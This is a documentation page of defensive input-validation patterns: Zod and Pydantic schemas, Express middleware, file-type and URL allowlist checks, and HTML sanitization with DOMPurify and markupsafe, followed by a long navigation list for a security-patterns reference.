SQL InjectionParameterized queries, ORM
XSSEscape output, CSP headers
CSRFCSRF tokens, SameSite cookies
Auth bypassCheck permissions every request
Secrets in codeEnvironment variables, vault
Weak cryptoArgon2/bcrypt, TLS 1.3, AES-256-GCM

Validation Patterns

Input Validation Patterns

API Request Validation (TypeScript)

import { z } from 'zod';

// Request body schema
const CreateUserSchema = z.object({
  email: z.string().email(),
  password: z.string().min(8).max(100),
  name: z.string().min(2).max(100).transform(s => s.trim()),
  role: z.enum(['user', 'admin']).default('user'),
  metadata: z.record(z.string()).optional(),
});

type CreateUserRequest = z.infer<typeof CreateUserSchema>;

// Express middleware
function validateBody<T extends z.ZodSchema>(schema: T) {
  return (req: Request, res: Response, next: NextFunction) => {
    const result = schema.safeParse(req.body);
    if (!result.success) {
      return res.status(400).json({
        error: 'Validation failed',
        details: result.error.flatten().fieldErrors,
      });
    }
    req.body = result.data;
    next();
  };
}

// Usage
app.post('/api/users', validateBody(CreateUserSchema), async (req, res) => {
  const user = req.body as CreateUserRequest;
  // user is fully typed and validated
});

Query Parameter Validation

const PaginationSchema = z.object({
  page: z.coerce.number().int().positive().default(1),
  limit: z.coerce.number().int().min(1).max(100).default(20),
  sort: z.enum(['name', 'email', 'createdAt']).default('createdAt'),
  order: z.enum(['asc', 'desc']).default('desc'),
});

function validateQuery<T extends z.ZodSchema>(schema: T) {
  return (req: Request, res: Response, next: NextFunction) => {
    const result = schema.safeParse(req.query);
    if (!result.success) {
      return res.status(400).json({
        error: 'Invalid query parameters',
        details: result.error.flatten().fieldErrors,
      });
    }
    req.query = result.data;
    next();
  };
}

app.get('/api/users', validateQuery(PaginationSchema), (req, res) => {
  const { page, limit, sort, order } = req.query;
  // All values are properly typed and defaulted
});

Discriminated Union for Polymorphic Data

const NotificationSchema = z.discriminatedUnion('type', [
  z.object({
    type: z.literal('email'),
    email: z.string().email(),
    subject: z.string().min(1),
    body: z.string().min(1),
  }),
  z.object({
    type: z.literal('sms'),
    phone: z.string().regex(/^\+[1-9]\d{1,14}$/),
    message: z.string().max(160),
  }),
  z.object({
    type: z.literal('push'),
    deviceToken: z.string().min(1),
    title: z.string().max(50),
    body: z.string().max(200),
  }),
]);

type Notification = z.infer<typeof NotificationSchema>;

// Type-safe handling
function sendNotification(notification: Notification) {
  switch (notification.type) {
    case 'email':
      return sendEmail(notification.email, notification.subject, notification.body);
    case 'sms':
      return sendSMS(notification.phone, notification.message);
    case 'push':
      return sendPush(notification.deviceToken, notification.title, notification.body);
  }
}

Allowlist Validation

// Only allow specific values
const SortColumnSchema = z.enum(['name', 'email', 'createdAt', 'updatedAt']);

// For dynamic allowlists
function createAllowlistSchema<T extends string>(allowed: readonly T[]) {
  return z.enum(allowed as [T, ...T[]]);
}

const allowedColumns = ['name', 'email', 'createdAt'] as const;
const DynamicSortSchema = createAllowlistSchema(allowedColumns);

File Upload Validation

const FileUploadSchema = z.object({
  file: z.object({
    name: z.string(),
    type: z.enum(['image/jpeg', 'image/png', 'image/webp', 'application/pdf']),
    size: z.number().max(5 * 1024 * 1024, 'File must be under 5MB'),
  }),
});

// Validate file content (magic bytes)
const imageMagicBytes: Record<string, number[]> = {
  'image/jpeg': [0xFF, 0xD8, 0xFF],
  'image/png': [0x89, 0x50, 0x4E, 0x47],
  'image/webp': [0x52, 0x49, 0x46, 0x46],
  'application/pdf': [0x25, 0x50, 0x44, 0x46],
};

function validateFileContent(buffer: Buffer, mimeType: string): boolean {
  const expected = imageMagicBytes[mimeType];
  if (!expected) return false;
  return expected.every((byte, i) => buffer[i] === byte);
}

URL Validation with Domain Allowlist

const ALLOWED_DOMAINS = ['api.example.com', 'cdn.example.com'] as const;

const UrlSchema = z.string()
  .url()
  .refine(
    (url) => {
      const { hostname, protocol } = new URL(url);
      return protocol === 'https:' && ALLOWED_DOMAINS.includes(hostname as any);
    },
    { message: 'URL must be HTTPS and from allowed domains' }
  );

// Usage
UrlSchema.parse('https://api.example.com/data'); // OK
UrlSchema.parse('https://evil.com/data');        // Error
UrlSchema.parse('http://api.example.com/data');  // Error (not HTTPS)

Python (Pydantic) Validation

from pydantic import BaseModel, EmailStr, Field, field_validator
from typing import Literal, Union

# Basic model
class UserCreate(BaseModel):
    email: EmailStr
    name: str = Field(min_length=2, max_length=100)
    age: int = Field(ge=0, le=150)
    
    @field_validator('name')
    @classmethod
    def strip_and_title(cls, v: str) -> str:
        return v.strip().title()

# Discriminated union
class EmailNotification(BaseModel):
    type: Literal['email']
    email: EmailStr
    subject: str
    body: str

class SMSNotification(BaseModel):
    type: Literal['sms']
    phone: str
    message: str = Field(max_length=160)

Notification = Union[EmailNotification, SMSNotification]

# Allowlist validation
ALLOWED_COLUMNS = frozenset(['name', 'email', 'created_at'])

def validate_sort_column(column: str) -> str:
    if column not in ALLOWED_COLUMNS:
        raise ValueError(f"Invalid sort column: {column}")
    return column

HTML Sanitization

from markupsafe import escape

@app.route('/comment', methods=['POST'])
def create_comment():
    # Escape HTML to prevent XSS
    content = escape(request.form['content'])
    db.execute("INSERT INTO comments (content) VALUES (?)", [content])
import DOMPurify from 'dompurify';

// Sanitize HTML input
const sanitizedHtml = DOMPurify.sanitize(userInput, {
  ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a'],
  ALLOWED_ATTR: ['href'],
});

Form Validation with React Hook Form

import { useForm } from 'react-hook-form';
import { zodResolver } from '@hookform/resolvers/zod';

const SignupSchema = z.object({
  email: z.string().email('Invalid email'),
  password: z.string()
    .min(8, 'Password must be at least 8 characters')
    .regex(/[A-Z]/, 'Must contain uppercase')
    .regex(/[0-9]/, 'Must contain number'),
  confirmPassword: z.string(),
}).refine(data => data.password === data.confirmPassword, {
  message: "Passwords don't match",
  path: ['confirmPassword'],
});

type SignupForm = z.infer<typeof SignupSchema>;

function SignupForm() {
  const { register, handleSubmit, formState: { errors } } = useForm<SignupForm>({
    resolver: zodResolver(SignupSchema),
  });

  return (
    <form onSubmit={handleSubmit(onSubmit)}>
      <input {...register('email')} placeholder="Email" />
      {errors.email && <span className="error">{errors.email.message}</span>}
      
      <input {...register('password')} type="password" placeholder="Password" />
      {errors.password && <span className="error">{errors.password.message}</span>}
      
      <input {...register('confirmPassword')} type="password" placeholder="Confirm" />
      {errors.confirmPassword && <span className="error">{errors.confirmPassword.message}</span>}
      
      <button type="submit">Sign Up</button>
    </form>
  );
}
Edit on GitHub

Last updated on

On this page

Security PatternsQuick ReferenceQuick StartAuthenticationDefense-in-DepthInput ValidationOWASP Top 10LLM SafetyPII MaskingScanningAdvanced GuardrailsManaged Hook Hierarchy (CC 2.1.49)Anti-Patterns (FORBIDDEN)Detailed DocumentationRelated SkillsCapability Detailsauthenticationdefense-in-depthinput-validationowasp-top-10llm-safetypii-maskingRules (18)Auth: JWT Tokens & Password Hashing — CRITICALJWT Tokens & Password HashingPassword Hashing (Argon2id)JWT Access TokenToken Expiry GuidelinesRefresh Token RotationSession SecurityAnti-PatternsImplement OAuth 2.1 with mandatory PKCE, token rotation, and phishing-resistant passkeys — CRITICALOAuth 2.1 & Passkeys/WebAuthnOAuth 2.1 Key ChangesPKCE Flow (Required)DPoP (Demonstrating Proof of Possession)Passkeys/WebAuthn RegistrationPasskeys AuthenticationFrontend Passkey ImplementationAnti-PatternsEnforce role-based access control with multi-factor authentication and rate limiting — CRITICALRole-Based Access Control & Multi-Factor AuthenticationRole-Based Access ControlFastAPI RBACMulti-Factor Authentication (TOTP)Complete Login Flow with MFARate LimitingKey DecisionsDesign defense-in-depth with eight security layers from edge protection to observability — CRITICAL8-Layer Security ArchitectureOverviewThe ArchitectureLayer DetailsLayer 0: Edge ProtectionLayer 1: Gateway / AuthenticationLayer 2: Input ValidationLayer 3: AuthorizationLayer 4: Data AccessLayer 5: LLM OrchestrationLayer 6: Output ValidationLayer 7: Attribution & StorageLayer 8: ObservabilityImplementation ChecklistIndustry SourcesDefense: Zero Trust & Tenant Isolation — CRITICALZero Trust & Tenant IsolationImmutable Request ContextContext Creation at GatewayTenant-Scoped RepositoryVector Search with Tenant IsolationCaching with Tenant IsolationRow-Level Security (PostgreSQL)Audit LoggingAnti-PatternsTesting Tenant IsolationLLM Red-Teaming and OWASP LLM Compliance — CRITICALLLM Red-Teaming and OWASP LLM ComplianceDeploy NeMo Guardrails and Guardrails AI to defend against prompt injection and toxicity — CRITICALNeMo Guardrails and Guardrails AILLM: Content Filtering & Three-Phase Pattern — HIGHContent Filtering & Three-Phase PatternThe Three-Phase PatternPhase 1: Pre-LLM (Filter & Extract)Phase 2: LLM Call (Content Only)Phase 3: Post-LLM (Attribute)Complete WorkflowOutput ValidationCommon MistakesChecklist Before Any LLM CallApply output guardrails with schema validation, grounding checks, and content safety filtering — HIGHOutput GuardrailsPurposeSchema ValidationNo Hallucinated IDsGrounding ValidationContent SafetyCombined ValidatorAnti-PatternsDefend against prompt injection by routing identifiers around the LLM, not through prompts — HIGHPrompt Injection DefenseThe Core PrincipleWhy IDs in Prompts Are DangerousForbidden Parameters in PromptsDetection PatternSafe Prompt BuilderUsageCommon MistakesPre-LLM ChecklistPrevent JWT algorithm confusion, token sidejacking, CSRF, and session timing attacks — CRITICALAuthentication & Session AttacksJWT Algorithm ConfusionToken Sidejacking Protection (OWASP)CSRF ProtectionTiming Attack PreventionSecurity MisconfigurationVulnerable ComponentsJWT Security ChecklistDetectionSummaryPrevent SQL, command, and SSRF injection with parameterized queries and input validation — CRITICALInjection PreventionSQL InjectionSQL Injection Attack DemoCommand InjectionSSRF (Server-Side Request Forgery)Broken Access Control (IDOR)Cryptographic FailuresInsecure DeserializationDetection CommandsQuick ReferenceDetect PII exposure through regex and ML-based patterns using Presidio and LLM Guard — HIGHPII Detection PatternsRegex-Based DetectionMicrosoft Presidio PipelinePresidio Custom OperatorsCustom RecognizersLLM Guard AnonymizationLLM Guard Output ScanningAnti-PatternsKey DecisionsRedact PII from logs and traces automatically in Langfuse, structlog, and observability tools — HIGHPII Redaction & Observability IntegrationLangfuse Mask CallbackLangfuse with PresidioStructlog PII ProcessorLoguru PII FilterField-Specific RedactionLLM Guard DeanonymizationFull Secure PipelineTestingScan dependencies for CVEs, detect committed secrets, and run SAST to catch vulnerabilities before production — CRITICALDependency ScanningSecret DetectionStatic Analysis (SAST)Validate input with server-side schemas using Zod and Pydantic with allowlist patterns — HIGHInput Schema ValidationCore PrinciplesZod v4 SchemaType Coercion (v4)Pydantic (Python)Express MiddlewareQuery Parameter ValidationAnti-PatternsKey DecisionsValidation: Output Encoding & XSS Prevention — HIGHOutput Encoding & XSS PreventionHTML Sanitization (Python)HTML Sanitization (JavaScript)XSS PreventionServer-Side XSS Prevention (Flask)Security HeadersSRI for CDN ScriptsAnti-PatternsValidation: Advanced Schemas & File Validation — HIGHAdvanced Schemas & File ValidationDiscriminated UnionsFile Upload ValidationURL Validation with Domain AllowlistForm Validation with React Hook FormAllowlist PatternPython Discriminated UnionKey DecisionsReferences (15)Audit LoggingAudit LoggingPurposeWhat to LogAlways Log (Audit Events)Never Log (Sensitive Data)ImplementationSanitized LoggerAudit Event StructureUsage in OrchestKitLog RetentionIntegration with LangfuseCompliance ConsiderationsGDPRSOC2HIPAAContext SeparationContext Separation PatternThe ProblemThe Solution: Context SeparationImplementation1. Define What's Forbidden2. Separate Context from Content3. Audit Prompts Before SendingOrchestKit Integration PointsContent Analysis WorkflowCommon MistakesTesting Context SeparationLangfuse Mask CallbackLangfuse Mask CallbackBasic SetupWith PresidioReferencesLlm Guard SanitizationLLM Guard SanitizationInstallationBasic Input SanitizationOutput DeanonymizationOutput Sensitive Data DetectionFull Pipeline IntegrationConfiguration OptionsAnonymize ScannerRecognizer ConfigurationsHandling Overlapping EntitiesTestingReferencesLogging RedactionLogging Redaction PatternsStructlog ProcessorStructlog with PresidioLoguru FilterLoguru with Custom PatcherField-Specific RedactionContext Manager for Sensitive OperationsTesting Log RedactionReferencesOauth 2.1 PasskeysOAuth 2.1 & Passkeys ReferenceOAuth 2.1 OverviewKey Changes from OAuth 2.0PKCE Flow (Required)Token Lifetimes (2026 Recommendations)DPoP (Demonstrating Proof of Possession)Passkeys / WebAuthnOverviewRegistration FlowAuthentication FlowFrontend ImplementationRefresh Token RotationExternal LinksOutput GuardrailsOutput GuardrailsPurposeImplementation1. Validation Result Type2. Schema Validation3. No Hallucinated IDs4. Grounding Validation5. Content Safety6. Size Limits7. Combined ValidatorOrchestKit IntegrationCommon MistakesTesting GuardrailsPost Llm AttributionPost-LLM AttributionThe PrincipleImplementation1. Attribution Data Structure2. Attribution Function3. Storage with AttributionOrchestKit IntegrationContent Analysis WorkflowArtifact RetrievalCommon MistakesTesting AttributionPre Llm FilteringPre-LLM FilteringPurposeImplementation1. Tenant-Scoped Retrieval2. Content Extraction (Strip IDs)3. Full Pre-LLM PipelineOrchestKit IntegrationIn Content Analysis WorkflowIn Library SearchCommon MistakesTesting Pre-LLM FilteringPresidio IntegrationMicrosoft Presidio IntegrationInstallationBasic UsageCustom OperatorsCustom RecognizersReferencesPrompt AuditPrompt AuditPurposeOrchestKit Forbidden PatternsCritical (Block Immediately)Warning (Log and Review)Implementation1. Pattern Definitions2. Audit Function3. Audit Decorator4. Safe Prompt BuilderOrchestKit IntegrationWorkflow IntegrationCI/CD IntegrationTestingRequest Context PatternRequest Context PatternPurposeImplementationCreation at GatewayUsage in EndpointsOrchestKit ParametersWhy Immutable?Anti-PatternsTenant IsolationTenant Isolation PatternsThe Golden RuleWhy This MattersImplementation Pattern: Tenant-Scoped RepositoryVector Search with Tenant IsolationFull-Text Search with Tenant IsolationCaching with Tenant IsolationTesting Tenant IsolationCommon MistakesRow-Level Security (PostgreSQL)Vulnerability DemosVulnerability DemonstrationsSQL InjectionVulnerable CodeSecure CodeDetectionCross-Site Scripting (XSS)Vulnerable CodeSecure CodeDetectionCross-Site Request Forgery (CSRF)Vulnerable CodeSecure CodeDetectionAuthentication BypassVulnerable CodeSecure CodeDetectionSummary TableRelated SkillsZod V4 ApiZod v4 API ReferenceInstallationBasic TypesType Coercion (v4 Feature)ObjectsDiscriminated Unions (Recommended)TransformsRefinementsAsync RefinementsError HandlingReact Hook Form IntegrationPydantic Comparison (Python)External LinksChecklists (5)Auth ChecklistAuthentication Security ChecklistPassword SecurityToken SecuritySession SecurityOAuth 2.1 CompliancePasskeys/WebAuthn (If Implemented)Multi-Factor AuthenticationRate LimitingError MessagesSecure HeadersAudit LoggingReview ChecklistCommon Vulnerabilities to AvoidPre Deployment SecurityPre-Deployment Security ChecklistBefore deploying any AI feature, verify all 8 layers:Layer 0: Edge ProtectionLayer 1: Gateway / AuthenticationLayer 2: Input ValidationLayer 3: AuthorizationLayer 4: Data AccessLayer 5: LLM OrchestrationLayer 6: Output ValidationLayer 7: Attribution & StorageLayer 8: ObservabilityQuick Verification CommandsPre Llm CallPre-LLM Call ChecklistBefore ANY LLM Call in OrchestKitPhase 1: Context AvailablePhase 2: Data IsolationPhase 3: Source References CapturedPhase 4: Content ExtractionPhase 5: Prompt BuildingPhase 6: Prompt AuditPhase 7: LLM CallQuick Verification ScriptPost-LLM Attribution ChecklistSafety ChecklistLLM Safety ChecklistInput SafetyOutput SafetySystem PromptsGuardrailsMonitoringValidation ChecklistInput Validation ChecklistCore PrinciplesSchema DefinitionString ValidationNumber ValidationFile ValidationDatabase Query SafetyError MessagesValidation LibrariesTypeScript/JavaScriptPythonCommon PatternsAllowlist (✅ Do)Blocklist (❌ Don't)Type CoercionAsync ValidationSecurity HeadersReview ChecklistCommon Vulnerabilities to PreventExamples (3)Auth ImplementationsAuthentication Implementation ExamplesPassword Hashing (Argon2id)JWT Access TokenSession ManagementRate LimitingRole-Based Access ControlMulti-Factor Authentication (TOTP)Complete Login Flow with MFAOwasp Top10 FixesOWASP Top 10 - Vulnerable vs Secure CodeA01: Broken Access Control❌ Vulnerable: Direct Object Reference✅ Secure: Authorization CheckA02: Cryptographic Failures❌ Vulnerable: Weak Hashing✅ Secure: Modern Password HashingA03: Injection❌ Vulnerable: SQL Injection✅ Secure: Parameterized Query❌ Vulnerable: Command Injection✅ Secure: Use subprocess with list argsA05: Security Misconfiguration❌ Vulnerable: Debug in Production✅ Secure: Environment-based Config❌ Vulnerable: CORS Allow All✅ Secure: Explicit OriginsA07: XSS (Cross-Site Scripting)❌ Vulnerable: Unescaped Output✅ Secure: Text Content or SanitizationReact (Safe by Default)A08: Insecure Deserialization❌ Vulnerable: Pickle from Untrusted Source✅ Secure: Use JSONQuick ReferenceValidation PatternsInput Validation PatternsAPI Request Validation (TypeScript)Query Parameter ValidationDiscriminated Union for Polymorphic DataAllowlist ValidationFile Upload ValidationURL Validation with Domain AllowlistPython (Pydantic) ValidationHTML SanitizationForm Validation with React Hook Form